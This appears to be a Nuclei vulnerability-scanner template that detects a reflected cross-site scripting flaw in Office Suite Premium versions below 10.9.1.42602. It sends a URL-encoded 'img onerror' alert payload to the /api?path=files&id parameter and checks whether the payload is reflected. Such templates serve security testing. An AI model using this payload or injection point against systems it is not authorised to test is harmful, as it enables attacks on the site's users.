id: office-suite-xss

info:
  name: Office Suite Premium < 10.9.1.42602 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Office Suite is suffering from an XSS vulnerability in the following parameter /api?path=files&id. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it.
  reference:
    - https://www.exploitalert.com/view-details.html?id=39632
  metadata:
    verified: true
    max-request: 1
  tags: xss,office,suite

http:
  - method: GET
    path:
      - "{{BaseURL}}/api?path=files&id=dfsse%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "<img src=a onerror=alert(document.domain)>", "\"payload\":")'
        condition: and
# digest: 4a0a004730450221009b4a9ed14ca64a6cbac768209123787beecf58891cbe12d0d2d81b291d6a8e6902206e3cc24d20508ceaad5f0ef2bfe6981766ee905d75c8759d63b29ec5eb0a7744:922c64590222798bb761d5b6d8e72950